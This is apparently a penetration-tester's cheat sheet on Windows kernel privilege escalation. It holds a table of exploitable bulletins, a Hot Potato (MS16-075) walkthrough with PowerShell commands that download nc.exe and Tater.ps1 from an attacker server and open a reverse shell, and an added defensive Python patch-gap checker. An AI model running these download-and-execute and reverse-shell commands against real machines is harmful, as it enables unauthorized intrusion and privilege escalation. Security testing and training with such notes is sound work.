Kernel Exploitation

Run Windows Exploit Suggester against saved systeminfo output (-d is the Microsoft security bulletin spreadsheet, -i the file holding the output of systeminfo):

https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py

$ python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt

List the installed patches (hotfixes) on the host:

$ wmic qfe get Caption,Description,HotFixID,InstalledOn

List of kernel exploits: https://github.com/SecWiki/windows-kernel-exploits

Columns: Security Bulletin, KB, Description, Operating System

  • MS17-017 [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8)

  • CVE-2017-8464 [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008)

  • CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)

  • CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)

  • CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)

  • MS17-010 [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)

  • MS16-135 [KB3199135]  [Windows Kernel Mode Drivers]  (2016)

  • MS16-111 [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)

  • MS16-098 [KB3178466]  [Kernel Driver]  (Win 8.1)

  • MS16-075 [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)

  • Example of Hot Potato exploitation (MS16-075)

Attacker:
$ sudo python -m SimpleHTTPServer 80
$ sudo nc -lvp <PORT>

Victim:
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Tater.ps1', '.\Tater.ps1')
powershell -exec bypass -command "& { Import-Module .\Tater.ps1; Invoke-Tater -Trigger 1 -Command '.\nc.exe <IP> <PORT> -e cmd.exe' }"

  • MS16-034 [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)

  • MS16-032 [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)

  • MS16-016 [KB3136041]  [WebDAV]  (2008/Vista/7)

  • MS16-014 [KB3134228]  [remote code execution]  (2008/Vista/7) ...

  • MS03-026 [KB823980]   [Buffer Overrun In RPC Interface]  (NT/2000/XP/2003)
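
The suggester step above, the wmic qfe listing and the bulletin table can be tied together in one offline patch-gap check. The script below is an added example, not code from Windows-Exploit-Suggester or the SecWiki repository: it reads the text of systeminfo or wmic qfe output, collects the installed KB identifiers, and reports which of the bulletins in this list have no matching KB for the host's OS. The two sample outputs are constructed; the CVE-only entries carry no KB number, so they are left out of the table.

```python
"""Offline patch-gap check for the bulletins listed on this page.

Added example (not code from Windows-Exploit-Suggester or the SecWiki repository).
It reads the text of `systeminfo` or `wmic qfe get ...` output, collects the
installed KB identifiers, and reports which of the page's bulletins have no
matching KB for the host's OS. The sample outputs below are constructed.
"""
import re

# (bulletin, KB, description, OS tokens) copied from the list on this page.
# CVE-only entries carry no KB number and therefore cannot be matched this way.
BULLETINS = [
    ("MS17-017", "KB4013081", "GDI Palette Objects Local Privilege Escalation", ("7", "8")),
    ("MS17-010", "KB4013389", "Windows Kernel Mode Drivers", ("7", "2008", "2003", "XP")),
    ("MS16-135", "KB3199135", "Windows Kernel Mode Drivers", ("2016",)),
    ("MS16-111", "KB3186973", "kernel api", ("10", "8.1")),
    ("MS16-098", "KB3178466", "Kernel Driver", ("8.1",)),
    ("MS16-075", "KB3164038", "Hot Potato", ("2003", "2008", "7", "8", "2012")),
    ("MS16-034", "KB3143145", "Kernel Driver", ("2008", "7", "8", "10", "2012")),
    ("MS16-032", "KB3143141", "Secondary Logon Handle", ("2008", "7", "8", "10", "2012")),
    ("MS16-016", "KB3136041", "WebDAV", ("2008", "Vista", "7")),
    ("MS16-014", "KB3134228", "remote code execution", ("2008", "Vista", "7")),
    ("MS03-026", "KB823980", "Buffer Overrun In RPC Interface", ("NT", "2000", "XP", "2003")),
]

KB_RE = re.compile(r"\bKB\d{6,7}\b")
OS_NAME_RE = re.compile(r"^OS Name:\s*(.+)$", re.MULTILINE)


def installed_kbs(text):
    """Every KBnnnnnn token in systeminfo or wmic qfe output (both print hotfixes as KB ids)."""
    return set(KB_RE.findall(text))


def os_name(text):
    """The 'OS Name:' line of systeminfo output, or None for wmic qfe output, which has none."""
    m = OS_NAME_RE.search(text)
    return m.group(1).strip() if m else None


def applies_to(os_string, tokens):
    """True when any OS token from the page appears as a whole word in the OS name.
    A plain '8' token also matches '8.1', so the check over-reports rather than misses."""
    if os_string is None:
        return True  # no OS information: keep every bulletin as a candidate
    return any(re.search(r"\b" + re.escape(t) + r"\b", os_string) for t in tokens)


def missing_bulletins(text):
    """Bulletins whose KB is absent for the host's OS, as (bulletin, KB, description).

    Absence of the exact KB is only a lead: a later cumulative or superseding update
    may include the fix, so each hit still needs confirmation against the vendor's
    supersedence data before the host is treated as unpatched.
    """
    present = installed_kbs(text)
    name = os_name(text)
    return [(b, kb, desc) for b, kb, desc, tokens in BULLETINS
            if kb not in present and applies_to(name, tokens)]


# Constructed sample: abbreviated systeminfo output from a Windows 7 host.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WS-EXAMPLE
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4013081
                           [02]: KB3143141
                           [03]: KB2999226
"""

# Constructed sample: wmic qfe output in the column order used on this page.
SAMPLE_WMIC_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=4013389  Security Update  KB4013389  3/15/2017
http://support.microsoft.com/?kbid=3164038  Security Update  KB3164038  6/15/2016
"""

if __name__ == "__main__":
    for b, kb, desc in missing_bulletins(SAMPLE_SYSTEMINFO):
        print(f"{b} {kb} not found: {desc}")
```

Run it on a real systeminfo capture by replacing SAMPLE_SYSTEMINFO with the file contents; wmic qfe output works too, but without an OS Name line every bulletin stays a candidate. Treat each hit as a patch to verify in the update history, not as a confirmed vulnerability, because superseding updates retire the original KB numbers.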

To cross-compile a Windows executable from Kali (here useradd.c into adduser.exe), use the following command.

Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
